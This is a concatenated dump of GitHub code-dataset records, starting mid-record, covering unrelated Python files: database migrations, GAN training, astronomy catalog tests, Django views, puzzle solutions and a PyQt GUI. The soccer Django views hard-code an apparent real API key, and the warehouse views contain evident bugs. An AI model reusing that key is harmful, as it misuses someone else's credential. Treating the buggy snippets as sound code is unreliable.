win.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36066644880","text":"\"\"\"show language field\n\nRevision ID: 22f62dd63bd4\nRevises: 1852cafc4891\nCreate Date: 2019-08-25 14:39:43.373197\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '22f62dd63bd4'\ndown_revision = '1852cafc4891'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n op.add_column('shows',\n sa.Column(\n 'language', \n sa.String(100),\n )\n )\n\n\ndef downgrade():\n raise NotImplemented()\n","repo_name":"thomaserlang/seplis","sub_path":"seplis/api/migration/versions/22f62dd63bd4_show_language_field.py","file_name":"22f62dd63bd4_show_language_field.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"39069301065","text":"\nfrom collections import OrderedDict\nfrom train import train\nimport numpy as np\nimport torch.nn as nn\nfrom models.style_verbose import G_mapping,G_synthesis\nfrom models.styleGan import Discriminator,StyleBased_Generator\nfrom dataset import return_cifar10\nimport os\n\ndef check_paths():\n base_dir = os.getcwd()\n paths = ['generated_images','model_weights']\n for path in paths:\n dir_path = os.path.join(base_dir,path)\n if not os.path.isdir(path): \n os.mkdir(dir_path) \n\ndef main():\n check_paths()\n # Load data\n cifar10_path = '/home/shuza/Documents/Data/cifar-10-batches-py'\n train_data,test_data = return_cifar10(cifar10_path)\n train_x,train_labels = train_data\n test_x,test_labels = test_data\n\n params = {\n 'base_dir': os.getcwd(),\n 'image_dir' : os.path.join(os.getcwd(),'generated_images'),\n 'weight_dir' : os.path.join(os.getcwd(),'model_weights'),\n 'iterations':1000,\n 'batch_size':1,\n 'latent_dim':512,\n 'alpha': 0,\n 'resolution':32,\n 'step' : 3\n }\n datasets = {\n 'x_train':train_x.transpose(0,3,2,1),\n 'x_test':test_x.transpose(0,3,2,1),\n 'train_labels':train_labels,\n 'test_labels':test_labels\n }\n # generator = nn.Sequential(OrderedDict([\n # ('g_mapping', G_mapping()),\n # #('truncation', Truncation(avg_latent)),\n # ('g_synthesis', G_synthesis()) \n # ]))\n # Model params\n n_fc = 8\n dim_latent = 512\n dim_input = 4\n\n generator = StyleBased_Generator(n_fc,dim_latent,dim_input)\n discriminator = Discriminator()\n train(params,datasets,generator,discriminator)\n\nif __name__ == \"__main__\":\n main()","repo_name":"Morgan-Griffiths/GAN","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72825716393","text":"import csv\nimport os\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas\nimport pytest\nfrom astropy import units as u\nfrom astropy import wcs\nfrom astropy.coordinates import ICRS\nfrom astropy.io import fits\nfrom astropy.io.fits import Header\nfrom astropy_healpix import HEALPix\nfrom logzero import logger\nfrom . import sample_headers\n\nfrom src.fitstools.catalog import Catalogs\nfrom src.fitstools.util import read_headers\n\nour_path = os.path.dirname(__file__)\ndeep_sky_file = os.path.join(our_path, \"../fitstools/data/deep_sky.csv\")\nhyperleda_file = os.path.join(our_path, \"../fitstools/data/hyperleda.csv\")\ntest_file = os.path.join(Path(__file__).parent, \"test-data\\\\M57_2020-05-30T022249_30sec_HaOIII_COLD_-17C_frame19.fit\")\n\ndef test_csv_reader():\n logger.info(\"start\")\n count = 0\n catalog = []\n with open(hyperleda_file, newline='', encoding=\"utf-8\") as fh:\n fh.readline() # skip first line\n fh.readline() # skip 2nd line\n reader = csv.reader(fh)\n for line in reader:\n if len(line) < 3:\n continue\n ra_deg = (int(line[0]) / float(864000 / 360)) # * u.deg\n dec_deg = (int(line[1]) / float(324000 / 90)) # * u.deg\n # catalog.append([ra_deg, dec_deg])\n count += 1\n\n logger.info(\"stop - \" + str(count))\n\n\ndef test_pandas_reader():\n header = read_headers(test_file)\n w = wcs.WCS(header).celestial\n hp = HEALPix(nside=16, frame='icrs')\n\n logger.info(\"start\")\n df = pandas.read_csv(hyperleda_file, skiprows=1, engine='c', usecols=[0, 1, 2], header=0,\n names=['ra', 'dec', 'name'], dtype={'ra': np.int, 'dec': np.int, 'name': np.object})\n df['ra'] = df['ra'] / np.float(864000 / 360)\n df['dec'] = df['dec'] / np.float(324000 / 90)\n ra = df.ra.to_numpy() * u.deg\n dec = df.dec.to_numpy() * u.deg\n df['hp'] = hp.lonlat_to_healpix(ra, dec)\n\n logger.info(\"stop - \" + str(len(df)))\n cat = df.groupby('hp')\n logger.info(\"groupby - \" + str(len(df)))\n\n@pytest.fixture()\ndef catalog():\n catalog = Catalogs()\n return catalog\n\n\ndef test_find_objects(catalog):\n header = Header.fromstring(sample_headers.header_sgp_fixed_wcs, \"\\n\")\n objects = catalog.find_objects(header)\n logger.info(objects)\n names = map(lambda t: t[2], objects)\n assert \"M57/NGC6720/Ring_Nebula\" in names\n assert \"IC1296\" in names\n\n\ndef test_wcs_astap():\n with fits.open(test_file, mode='readonly') as hdul:\n validation = wcs.validate(hdul)\n print(validation)\n print(\"------------------------------------------\")\n\n header = read_headers(test_file)\n w = wcs.WCS(header).celestial\n print(w.wcs.name)\n w.wcs.print_contents()\n print(\"------------------------------------------\")\n\n w.printwcs()\n print(\"------------------------------------------\")\n\n fp = w.calc_footprint()\n for point in fp:\n c = ICRS(point[0] * u.degree, point[1] * u.degree)\n rahmsstr = c.ra.to_string(u.hour)\n decdmsstr = c.dec.to_string(u.degree, alwayssign=True)\n print(rahmsstr + ' ' + decdmsstr)\n\n\ndef test_wcs_sgp():\n with fits.open(test_file, mode='readonly') as hdul:\n validation = wcs.validate(hdul)\n print(validation)\n print(\"------------------------------------------\")\n\n header = read_headers(test_file)\n w = wcs.WCS(header).celestial\n print(w.wcs.name)\n w.wcs.print_contents()\n print(\"------------------------------------------\")\n\n w.printwcs()\n print(\"------------------------------------------\")\n\n fp = w.calc_footprint()\n for point in fp:\n c = ICRS(point[0] * u.degree, point[1] * u.degree)\n rahmsstr = c.ra.to_string(u.hour)\n decdmsstr = c.dec.to_string(u.degree, alwayssign=True)\n print(rahmsstr + ' ' + decdmsstr)\n","repo_name":"bcolyn/fitstools","sub_path":"src/tests/test_catalog.py","file_name":"test_catalog.py","file_ext":"py","file_size_in_byte":3811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33867249762","text":"import logging\nimport time\nimport pyautogui\nfrom copy import copy\n\n\ndef go_back():\n pyautogui.hotkey('ctrl', 'backspace')\n\n\ndef scroll(self, amount=1):\n for i in range(amount):\n move_mouse(self, self.width // 2, int(self.height * self.scroll_up_mouse_pos))\n pyautogui.dragTo(0, int(self.height * self.scroll_down_mouse_pos), self.scroll_time)\n move_mouse(self, self.width // 2, int(self.height * self.scroll_up_mouse_pos))\n pyautogui.dragTo(0, int(self.height * self.scroll_down_mouse_pos), self.scroll_time)\n time.sleep(self.scroll_time)\n\n\ndef move_mouse(self, rel_x1, rel_y1, rel_x2=None, rel_y2=None, start_x=None, start_y=None, sleep_time=None,\n click=False, sleep=False):\n if start_x is None:\n start_x = copy(self.start_x)\n if start_y is None:\n start_y = copy(self.start_y)\n if sleep_time is None:\n sleep_time = copy(self.loading_time)\n if rel_x2 is None and rel_y2 is None:\n pyautogui.moveTo(start_x + rel_x1, start_y + rel_y1)\n elif rel_x2 is None:\n pyautogui.moveTo(start_x + rel_x1, start_y + rel_y1 + (rel_y2 - rel_y1) // 2)\n elif rel_y2 is None:\n pyautogui.moveTo(start_x + rel_x1 + (rel_x2 - rel_x1) // 2, start_y + rel_y1)\n else:\n pyautogui.moveTo(start_x + rel_x1 + (rel_x2 - rel_x1) // 2, start_y + rel_y1 + (rel_y2 - rel_y1) // 2)\n if click:\n pyautogui.click()\n if sleep:\n time.sleep(sleep_time)\n","repo_name":"TrueBalkar/TrusteePlusAnalyzer","sub_path":"scanner/navigation/essentials.py","file_name":"essentials.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70654824873","text":"from django.shortcuts import render\n\nimport requests\nfrom datetime import datetime\n\n# Create your views here.\n\ndef index(request):\n url = 'https://apiv3.apifootball.com/?action=get_events&from=2023-02-01&to=2023-02-07&league_id=164&APIkey=ba3ed274d9d1bc601524bf1422864036f2bfcacd977264d887fa1954bd9772e9'\n r = requests.get(url)\n jsonResp = r.json()\n# print(jsonResp)\n\n return render(request, 'soccerapp/index.html', {'jr': jsonResp})\n\ndef today(request):\n today = datetime.today().strftime('%Y-%m-%d')\n url = f'https://apiv3.apifootball.com/?action=get_events&from={today}&to={today}&league_id=164&APIkey=ba3ed274d9d1bc601524bf1422864036f2bfcacd977264d887fa1954bd9772e9'\n print(url)\n r = requests.get(url)\n jsonResp = r.json()\n\n return render(request, 'soccerapp/index.html', {'jr': jsonResp})","repo_name":"yernarsha/django_soccer_results","sub_path":"soccerapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"24216218495","text":"\"\"\"\nPart 1\n------\nWe assume the data is a directed acyclic graph (DAG) of tasks.\n\nRepresented by a set of nodes, and a dictionary mapping Target nodes to a list\nof their pre-requisites.\n\nWe need to build a basic task scheduler:\n Starting with leaf nodes (initial available nodes)\n Loop until no available nodes:\n Given all available nodes, schedule first (in alphabetical order)\n Update list of available nodes\n Create a new tree: where scheduled node is removed from all\n dependency lists\n\nScratch that, new idea\n----------------------\n\nBuild a list of Node objects\n Nodes know their pre-requisite nodes (prev)\n and which nodes they are pre-requisites of (next)\nIdentify leaf nodes as those nodes with no prev\nSet leaf nodes to available\nLoop:\n Given available nodes, schedule / resolve first\n For each of the scheduled_node's next_nodes\n Remove scheduled_node from their prev\n Update list of available - all nodes with no prev\n\nPart 2\n------\nA worker is an object that either points to a Node or points to nothing (idle)\nand chips away at the Node's cost at each timestep in a loop\n\nMain Loop:\n For each idle worker:\n assign to any available\n\n complete 1 second of work\n\n if no seconds of work left, make idle\n\"\"\"\nimport re\nfrom copy import deepcopy\nfrom string import ascii_uppercase\nfrom typing import Dict, List, Set\n\n\nLETTER_COST = {letter: (i + 1) for i, letter in enumerate(ascii_uppercase)}\n\n\nclass Node:\n def __init__(self,\n name: str,\n prev: Set[str] = None,\n next: Set[str] = None):\n self.name = name\n self.cost = LETTER_COST[name]\n self.prev = prev if prev is not None else set()\n self.next = next if next is not None else set()\n\n def __repr__(self):\n return f'Node({self.name},' \\\n f'cost={self.cost},' \\\n f'prev={self.prev},' \\\n f'next={self.next})'\n\n def update(self):\n self.cost -= 1\n if self.cost < 0:\n raise RuntimeError('cost must not be less than zero')\n\n\ndef parse_nodes(lines: List[str]) -> Dict[str, Node]:\n pattern = re.compile(\n r'^Step ([A-Z]) must be finished before step ([A-Z]) can begin.$')\n nodes: Dict[str, Node] = {}\n for line in lines:\n req, target = re.match(pattern, line.strip()).groups()\n\n if req not in nodes:\n nodes[req] = Node(req)\n nodes[req].next.add(target)\n\n if target not in nodes:\n nodes[target] = Node(target)\n nodes[target].prev.add(req)\n\n return nodes\n\n\ndef leaf_nodes(nodes: Dict[str, Node]) -> List[str]:\n return [name for name, node in nodes.items() if not node.prev]\n\n\ndef schedule_nodes(nodes: Dict[str, Node]) -> List[str]:\n nodes = deepcopy(nodes)\n schedule = []\n available = sorted(leaf_nodes(nodes))\n while available:\n scheduled = available[0]\n scheduled_node = nodes.pop(scheduled)\n\n for name in scheduled_node.next:\n node = nodes[name]\n node.prev.discard(scheduled)\n\n available = sorted(leaf_nodes(nodes))\n\n schedule.append(scheduled)\n\n return schedule\n\n\ndef multi_schedule_nodes(nodes: Dict[str, Node],\n num_workers: int,\n base_cost: int) -> int:\n\n for _, node in nodes.items():\n node.cost += base_cost\n\n workers = [id for id in range(num_workers)]\n jobs = {id: None for id in workers}\n\n available = sorted(leaf_nodes(nodes))\n done: List[str] = []\n time = 0\n\n msg = 'Second '\n for id in workers:\n msg += f'Worker {id} '\n msg += 'Done'\n print(msg)\n\n while True:\n # Schedule jobs to idle workers\n idle_workers = [id for id, node in jobs.items() if node is None]\n for worker in idle_workers:\n if not available:\n break\n jobs[worker] = available.pop(0)\n\n # Logging\n msg = f'{time:4d} '\n sorted_job_nodes = [jobs[id] for id in workers]\n for node in sorted_job_nodes:\n if node is None:\n node = '.'\n msg += f' {node:^8} '\n done_str = ''.join(done)\n msg += done_str\n print(msg)\n\n if not nodes:\n break\n\n # Apply work: reduce each job node's cost by 1\n active_workers = [id for id, node in jobs.items() if node is not None]\n for worker in active_workers:\n name = jobs[worker]\n node = nodes[name]\n node.update()\n\n # If node is completed, update graph\n if node.cost == 0:\n # Set worker to idle\n jobs[worker] = None\n # Remove this node from the list\n nodes.pop(name)\n done.append(name)\n # Remove this node from next node's state\n for next_name in node.next:\n next_node = nodes[next_name]\n next_node.prev.discard(name)\n\n scheduled = jobs.values()\n available = [name for name in sorted(leaf_nodes(nodes))\n if name not in scheduled]\n # print(nodes)\n\n time += 1\n\n return time\n\n\ntest_lines = \"\"\"Step C must be finished before step A can begin.\n Step C must be finished before step F can begin.\n Step A must be finished before step B can begin.\n Step A must be finished before step D can begin.\n Step B must be finished before step E can begin.\n Step D must be finished before step E can begin.\n Step F must be finished before step E can begin.\"\"\".split('\\n')\ntest_nodes = parse_nodes(test_lines)\nassert leaf_nodes(test_nodes) == ['C']\nassert ''.join(schedule_nodes(test_nodes)) == 'CABDFE'\nassert multi_schedule_nodes(test_nodes, 2, 0) == 15\n\nif __name__ == '__main__':\n with open('data/day_07.txt') as f:\n nodes = parse_nodes(f.readlines())\n print(''.join(schedule_nodes(nodes)))\n print(multi_schedule_nodes(nodes, 5, 60))\n","repo_name":"seeM/advent-of-code-2018","sub_path":"day_07.py","file_name":"day_07.py","file_ext":"py","file_size_in_byte":6112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15174835199","text":"s = input()\r\n\r\nans = 0\r\nfor i, x in enumerate(s):\r\n if i % 2 == 0 and x == 'p':\r\n ans -= 1\r\n elif i % 2 == 1 and x == 'g':\r\n ans += 1\r\n\r\nprint(ans)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc062/B/4408233.py","file_name":"4408233.py","file_ext":"py","file_size_in_byte":167,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"39993157361","text":"\"\"\"\nТак как ограничения в задаче малы - можно решить перебором\n\"\"\"\n\n\ndef walk_right(lst, house):\n \"\"\"\n Двигаемся от текущего дома вправо\n\n :param lst: список с домами\n :param house: текущий индекс здания\n :return: расстояние от дома до магазина\n \"\"\"\n num = house + 1\n while num < 10:\n if lst[num] == 2:\n return num - house\n num += 1\n return 11\n\n\ndef walk_left(lst, house):\n \"\"\"\n Двигаемся от текущего дома влево\n\n :param lst: список с домами\n :param house: текущий индекс здания\n :return: расстояние от дома до магазина\n \"\"\"\n num = house - 1\n while num >= 0:\n if lst[num] == 2:\n return house - num\n num -= 1\n return 11\n\n\nif __name__ == '__main__':\n a = list(map(int, input().split())) # считываем весь список домов\n\n max_path = 0 # максимальное расстояние\n\n for index, elem in enumerate(a):\n if elem == 1:\n # если элемент - дом, то ищем минимальное расстояние до магазина\n # и сравниваем с текущим максимумом\n max_path = max(min(walk_right(a, index),\n walk_left(a, index)),\n max_path)\n print(max_path) # выодим ответ\n","repo_name":"danfimov/yandex-algorithm-trainings","sub_path":"Division_B/Homework_2/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31367099295","text":"from django.shortcuts import render, redirect\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom .models import Products\r\nfrom .forms import ProductsForm\r\nfrom .filters import filterProducts\r\n\r\n\r\n\r\n\r\n# Create your views here.\r\n\r\n\r\n@login_required(login_url='login')\r\ndef index(request):\r\n return render(request, 'index.html')\r\n\r\n@login_required(login_url='login')\r\ndef addProduct(request):\r\n if request.method =='POST':\r\n name = request.POST['productname']\r\n category = request.POST['productcategory']\r\n quantity = request.POST['productquantity']\r\n price = request.POST['productprice']\r\n\r\n new_product = Products(name = name, category = category, quantity = quantity, price = price)\r\n new_product.save()\r\n\r\n return render(request, 'addProduct.html')\r\n\r\n@login_required(login_url='login')\r\ndef displayProduct(request):\r\n items = Products.objects.all() # using ORM\r\n # items = Products.objects.raw('SELECT * FROM displayProduct') -> for using SQL\r\n context = {\r\n 'items': items,\r\n \r\n }\r\n return render(request, 'displayProduct.html', context)\r\n\r\ndef delete(request, pk):\r\n remove = Products.objects.get(id=pk)\r\n if request.method == 'POST':\r\n remove.delete()\r\n return redirect ('displayProduct')\r\n return render(request, 'delete.html')\r\n\r\ndef update(request, pk):\r\n product = Products.objects.get(id=pk)\r\n form = ProductsForm(instance=product)\r\n if request.method == 'POST':\r\n form = ProductsForm(request.POST, instance=product)\r\n if form.is_valid():\r\n form.save()\r\n return redirect('displayProduct')\r\n\r\n context = {\r\n 'form':form,\r\n }\r\n return render(request, 'update.html', context)\r\n\r\n\r\n\r\n\r\n\r\n\r\n@login_required(login_url='login')\r\ndef searchProduct(request):\r\n product = Products.objects.all()\r\n filters = filterProducts(request.GET, queryset=product)\r\n\r\n context = {\r\n 'filters' : filters\r\n }\r\n return render(request, 'searchProduct.html', context)\r\n\r\n\r\n\r\n\r\n\r\n\r\n@login_required(login_url='login')\r\ndef totalpriceofProduct(request,self):\r\n price = self.product.price\r\n quantity = self.quantity\r\n total = price*quantity\r\n \r\n print(total)\r\n \r\n return render(request, 'totalpriceofProduct.html')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n@login_required(login_url='login')\r\ndef contacts(request):\r\n if request.method == \"POST\":\r\n contacts=contacts()\r\n name=request.POST.get('name')\r\n email=request.POST.get('emal')\r\n message=request.POST,get('message')\r\n\r\n contacts.name = name\r\n contacts.email = email\r\n contacts.message = message\r\n contacts.save()\r\n return redirect ('displayProduct')\r\n\r\n return render(request, 'contacts.html')\r\n\r\n\r\n\r\n\r\n\r\n@login_required(login_url='login')\r\ndef contactsfinal(request):\r\n return render(request, 'contactsfinal.html')\r\n","repo_name":"amanuel-lab/Warehouse-Managment-System-Final-Project","sub_path":"warehouseproject/warehouseapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18975694905","text":"import logging\nimport sys\nfrom functools import reduce\nimport operator\nimport os\nimport shutil\nimport tempfile\nimport unittest\n\nlogging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\n\nlogger = logging.getLogger()\n\n\ndef get_from_dict(data_dict, map_list):\n return reduce(operator.getitem, map_list, data_dict)\n\n\ndef set_in_dict(data_dict, map_list, value):\n get_from_dict(data_dict, map_list[:-1])[map_list[-1]] = value\n\n\ndef list_files(start_path):\n for root, dirs, files in os.walk(start_path, followlinks=True):\n level = root.replace(start_path, \"\").count(os.sep)\n indent = \" \" * 4 * level\n print(\"{}{}/\".format(indent, os.path.basename(root)))\n sub_indent = \" \" * 4 * (level + 1)\n for f in files:\n file_name = f\n if os.path.islink(os.path.join(root, f)):\n f += \"*\"\n print(\"{}{}\".format(sub_indent, file_name))\n\n\ndef dir_dict(start_path):\n structure = {}\n for root, dirs, files in os.walk(start_path, followlinks=True):\n current_level = os.path.relpath(root, start_path).split(os.sep)\n depth = len(current_level)\n if depth >= 1 and current_level[0] != \".\":\n current_dict = get_from_dict(structure, current_level)\n else:\n current_dict = structure\n\n for d in dirs:\n current_dict[d] = {}\n for f in files:\n current_dict[f] = \"\"\n return structure\n\n\ndef handle_links(function, path, execinfo):\n if function is os.path.islink:\n os.unlink(path)\n\n\ndef create_files_from_tree(tree, parent=\"\"):\n for name, content in tree.items():\n name = os.path.join(parent, name)\n if type(content) is dict:\n os.makedirs(name)\n create_files_from_tree(content, parent=name)\n else:\n open(name, \"a\").close()\n\n\nclass FileLinkTestCase(unittest.TestCase):\n def setUp(self):\n self.source_dir = tempfile.mkdtemp()\n self.source_tree = {}\n\n self.dest_dir = tempfile.mkdtemp()\n self.dest_tree = {}\n\n self.expected_tree = {}\n\n self.config_file_path = os.path.join(self.source_dir, \".cfgcaddy.yml\")\n\n open(self.config_file_path, \"a\").close()\n\n def tearDown(self):\n shutil.rmtree(self.source_dir, onerror=handle_links)\n shutil.rmtree(self.dest_dir, onerror=handle_links)\n\n def recursive_dircmp(self, dircmp_obj):\n self.assertListEqual(dircmp_obj.left_only, [])\n self.assertListEqual(dircmp_obj.right_only, [])\n for directory, sub_directory in dircmp_obj.subdirs.items():\n self.recursive_dircmp(sub_directory)\n\n def assertDestMatchesExpected(self):\n dest_tree = dir_dict(self.dest_dir)\n\n self.assertEqual(self.expected_tree, dest_tree)\n","repo_name":"tstapler/cfgcaddy","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"74317359272","text":"\nfrom PyQt5.QtWidgets import (\n QSlider,\n QLabel,\n QHBoxLayout,\n QVBoxLayout,\n QGroupBox,\n QCheckBox,\n QPushButton,\n QLineEdit\n)\n\nfrom PyQt5.QtGui import QDoubleValidator, QValidator\n\nimport numpy as np\nfrom pyqtgraph.Qt import QtCore\nfrom PyQt5.QtCore import Qt, pyqtSignal\nfrom functools import partial\n\n# class NotEmptyValidator(QValidator):\n\n \n # def validate(self, text: str, pos):\n # if text.strip().isdigit():\n # state = QValidator.Acceptable\n # else:\n # state = QValidator.Intermediate # so that field can be made empty temporarily\n # return state, text, pos\n \n'''This code makes the GUI interface for each component. \nThere is a lot of copypaste in this section'''\n\nclass LensGui():\n\n def __init__(self, name, f):\n '''GUI for the Lens component\n ----------\n name : str\n Name of component\n f : float\n Focal length\n '''\n self.box = QGroupBox(name)\n self.fslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.fslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.fslider.setMinimum(-10)\n self.fslider.setMaximum(10)\n self.fslider.setValue(1)\n self.fslider.setTickPosition(QSlider.TicksBelow)\n \n self.flineedit = QLineEdit(\"{:.4f}\".format(f))\n self.flineeditstep = QLineEdit(\"{:.4f}\".format(0.1))\n \n self.fwobblefreqlineedit = QLineEdit(\"{:.4f}\".format(1))\n self.fwobbleamplineedit = QLineEdit(\"{:.4f}\".format(0.5))\n \n qdoublevalidator = QDoubleValidator()\n self.flineedit.setValidator(qdoublevalidator)\n self.flineeditstep.setValidator(qdoublevalidator)\n self.fwobblefreqlineedit.setValidator(qdoublevalidator)\n self.fwobbleamplineedit.setValidator(qdoublevalidator)\n \n self.fwobble = QCheckBox('Wobble Lens Current')\n\n hbox = QHBoxLayout()\n hbox_lineedit = QHBoxLayout()\n hbox_lineedit.addWidget(QLabel('Focal Length = '))\n hbox_lineedit.addWidget(self.flineedit)\n hbox_lineedit.addWidget(QLabel('Slider Step = '))\n hbox_lineedit.addWidget(self.flineeditstep)\n hbox_slider = QHBoxLayout()\n hbox_slider.addWidget(self.fslider)\n hbox_wobble = QHBoxLayout()\n hbox_wobble.addWidget(self.fwobble)\n hbox_wobble.addWidget(QLabel('Wobble Frequency'))\n hbox_wobble.addWidget(self.fwobblefreqlineedit)\n hbox_wobble.addWidget(QLabel('Wobble Amplitude'))\n hbox_wobble.addWidget(self.fwobbleamplineedit)\n\n vbox = QVBoxLayout()\n vbox.addLayout(hbox_lineedit)\n vbox.addLayout(hbox_slider)\n vbox.addLayout(hbox_wobble)\n vbox.addStretch()\n\n self.box.setLayout(vbox)\n \n self.table = QGroupBox(name)\n self.flabel_table = QLabel('Focal Length = ' + \"{:.2f}\".format(f))\n self.flabel_table.setMinimumWidth(80)\n hbox = QHBoxLayout()\n hbox = QHBoxLayout()\n hbox.addWidget(self.flabel_table)\n\n vbox = QVBoxLayout()\n vbox.addLayout(hbox)\n self.table.setLayout(vbox)\n \nclass AstigmaticLensGui():\n '''Gui for the Astigmatic Lens component\n ''' \n def __init__(self, name, gui_label, comp_type, fx, fy):\n '''\n\n Parameters\n ----------\n name : str\n Name of component\n gui_label : str\n Label of focal length slider in GUI\n fx : float\n Focal length in x axis\n fy : float\n Focal length in y axis\n '''\n self.box = QGroupBox(name)\n self.fxslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.fxslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.fxslider.setMinimum(-10)\n self.fxslider.setMaximum(10)\n self.fxslider.setValue(1)\n self.fxslider.setTickPosition(QSlider.TicksBelow)\n self.fxlineedit = QLineEdit(\"{:.4f}\".format(fx))\n self.fxlineeditstep = QLineEdit(\"{:.4f}\".format(0.1))\n \n qdoublevalidator = QDoubleValidator()\n self.fxlineedit.setValidator(qdoublevalidator)\n self.fxlineeditstep.setValidator(qdoublevalidator)\n \n hbox = QHBoxLayout()\n hbox_lineedit = QHBoxLayout()\n hbox_lineedit.addWidget(QLabel('Focal Length X = '))\n hbox_lineedit.addWidget(self.fxlineedit)\n hbox_lineedit.addWidget(QLabel('Slider Step X = '))\n hbox_lineedit.addWidget(self.fxlineeditstep)\n hbox_slider = QHBoxLayout()\n hbox_slider.addWidget(self.fxslider)\n\n vbox = QVBoxLayout()\n vbox.addLayout(hbox_lineedit)\n vbox.addLayout(hbox_slider)\n vbox.addStretch()\n \n self.fyslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.fyslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.fyslider.setMinimum(-10)\n self.fyslider.setMaximum(10)\n self.fyslider.setValue(1)\n self.fyslider.setTickPosition(QSlider.TicksBelow)\n \n self.fylineedit = QLineEdit(\"{:.4f}\".format(fy))\n self.fylineeditstep = QLineEdit(\"{:.4f}\".format(0.1))\n self.fywobblineedit = QLineEdit(\"{:.4f}\".format(fy))\n self.fwobblefreqlineedit = QLineEdit(\"{:.4f}\".format(1))\n self.fwobbleamplineedit = QLineEdit(\"{:.4f}\".format(0.5))\n \n self.fylineedit.setValidator(qdoublevalidator)\n self.fylineeditstep.setValidator(qdoublevalidator)\n self.fwobbleamplineedit.setValidator(qdoublevalidator)\n self.fwobblefreqlineedit.setValidator(qdoublevalidator)\n \n self.fwobble = QCheckBox('Wobble Lens Current')\n\n hbox = QHBoxLayout()\n hbox_lineedit = QHBoxLayout()\n hbox_lineedit.addWidget(QLabel('Focal Length Y = '))\n hbox_lineedit.addWidget(self.fylineedit)\n hbox_lineedit.addWidget(QLabel('Slider Step Y = '))\n hbox_lineedit.addWidget(self.fylineeditstep)\n hbox_slider = QHBoxLayout()\n hbox_slider.addWidget(self.fyslider)\n \n vbox.addLayout(hbox_lineedit)\n vbox.addLayout(hbox_slider)\n \n if comp_type == 'Quadrupole':\n pass\n else:\n hbox_wobble = QHBoxLayout()\n hbox_wobble.addWidget(self.fwobble)\n hbox_wobble.addWidget(QLabel('Wobble Frequency'))\n hbox_wobble.addWidget(self.fwobblefreqlineedit)\n hbox_wobble.addWidget(QLabel('Wobble Amplitude'))\n hbox_wobble.addWidget(self.fwobbleamplineedit)\n vbox.addLayout(hbox_wobble)\n \n vbox.addStretch()\n\n self.box.setLayout(vbox)\n \n self.table = QGroupBox(name)\n \n self.flabelx_table = QLabel('Focal Length X = ' + \"{:.2f}\".format(fx))\n self.flabelx_table.setMinimumWidth(80)\n hbox = QHBoxLayout()\n hbox.addWidget(self.flabelx_table)\n \n self.flabely_table = QLabel('Focal Length Y = ' + \"{:.2f}\".format(fy))\n self.flabely_table.setMinimumWidth(80)\n hbox = QHBoxLayout()\n hbox.addWidget(self.flabely_table)\n\n vbox = QVBoxLayout()\n vbox.addLayout(hbox)\n self.table.setLayout(vbox)\n\nclass SampleGui():\n '''Gui to allow a user to move the sample in the 3D model\n ''' \n def __init__(self, name, x, y):\n '''\n\n Parameters\n ----------\n name : str\n Name of the component\n x : float\n X position of component\n y : float\n Y position of component\n '''\n self.box = QGroupBox(name)\n self.xslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.xslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.xslider.setMinimum(-100)\n self.xslider.setMaximum(100)\n self.xslider.setValue(int(round(x)))\n self.xslider.setTickPosition(QSlider.TicksBelow)\n\n self.xlabel = QLabel('X Position = ' + \"{:.2f}\".format(x))\n self.xlabel.setMinimumWidth(80)\n\n hbox = QHBoxLayout()\n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.xlabel)\n hbox.addSpacing(10)\n hbox.addWidget(self.xslider)\n\n vbox = QVBoxLayout()\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n\n self.yslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.yslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.yslider.setMinimum(-100)\n self.yslider.setMaximum(100)\n self.yslider.setValue(int(round(y)))\n self.yslider.setTickPosition(QSlider.TicksBelow)\n\n self.ylabel = QLabel('Y Position = ' + \"{:.2f}\".format(y))\n self.ylabel.setMinimumWidth(80)\n\n hbox = QHBoxLayout()\n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.ylabel)\n hbox.addSpacing(10)\n hbox.addWidget(self.yslider)\n\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n 